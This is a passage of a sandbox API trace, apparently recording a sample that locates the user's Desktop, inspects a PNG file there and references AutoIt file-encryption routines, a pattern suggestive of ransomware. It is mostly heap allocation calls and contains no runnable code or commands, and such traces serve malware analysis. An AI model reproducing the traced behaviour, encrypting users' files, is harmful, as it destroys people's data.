[0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0152.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0152.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0152.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0152.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0152.297] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0152.297] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0152.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0152.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0152.297] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0152.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0152.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0152.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.298] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0152.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0152.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0152.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0152.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0152.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0152.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53890 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0152.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0152.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0152.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0152.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0152.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0152.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0152.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0152.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0152.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0152.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0152.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0152.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0152.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0152.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0152.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0152.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0152.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0152.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0152.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0152.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0152.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.306] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/GHvT80V7X_pq3d.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f655430, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0xfafe4e70, ftLastAccessTime.dwHighDateTime=0x1d5e675, ftLastWriteTime.dwLowDateTime=0xfafe4e70, ftLastWriteTime.dwHighDateTime=0x1d5e675, nFileSizeHigh=0x0, nFileSizeLow=0x14189, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="GHvT80V7X_pq3d.png", cAlternateFileName="GHVT80~1.PNG")) returned 0xa876d0 [0152.307] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0152.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0152.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0152.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0152.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0152.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0152.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0152.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0152.308] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0152.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.308] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0152.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0152.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0152.309] HeapFree (in: 